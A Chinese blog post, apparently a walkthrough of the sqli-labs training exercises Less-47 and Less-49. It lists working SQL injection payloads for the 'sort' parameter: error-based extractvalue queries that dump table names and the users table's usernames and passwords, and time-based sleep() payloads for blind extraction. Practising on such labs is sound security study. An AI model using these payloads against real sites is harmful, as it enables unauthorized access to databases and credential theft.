当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
猜你喜欢

Nacos

MPPT太阳能充放电控制器数据采集-通过网关采集电池电压容量电量SOC,wifi传输

The effective square of the test (one question of the day 7/29)

力扣刷题之有效的正方形(每日一题7/29)

【银行系列第一期】中国人民银行

基于opencv实现人脸检测

Basic introduction to ShardingJDBC

1. Non-type template parameters 2. Specialization of templates 3. Explanation of inheritance

What have I experienced to become a tester who is harder than development?

Drools规则属性,高级语法
随机推荐
StringJoiner详解
汉源高科8路HDMI综合多业务高清视频光端机8路HDMI视频+8路双向音频+8路485数据+8路E1+32路电话+4路千兆物理隔离网络
Introduction to flask series 】 【 flask - using SQLAlchemy
Basic learning about Redis related content
multiplayer-hlap 包有问题,无法升级的解决方案
String为什么不可变?
Mathematical Ideas in AI
Project development software directory structure specification
Introduction and use of Drools WorkBench
Installation, start and stop of redis7 under Linux
The principle of complete replication of virtual machines (cloud computing)
PDF split/merge
Calculate S=a+aa+…+aa…a
AI在医疗影像设备全流程应用
修改未正确放入沙盒造成苹果兼容性问题
mmdetection训练一个模型相关命令
Fiddler captures packets to simulate weak network environment testing
【shell基础】判断目录是否为空
Drools Rule Properties, Advanced Syntax
LeetCode 1161 The largest element in the layer and the LeetCode road of [BFS binary tree] HERODING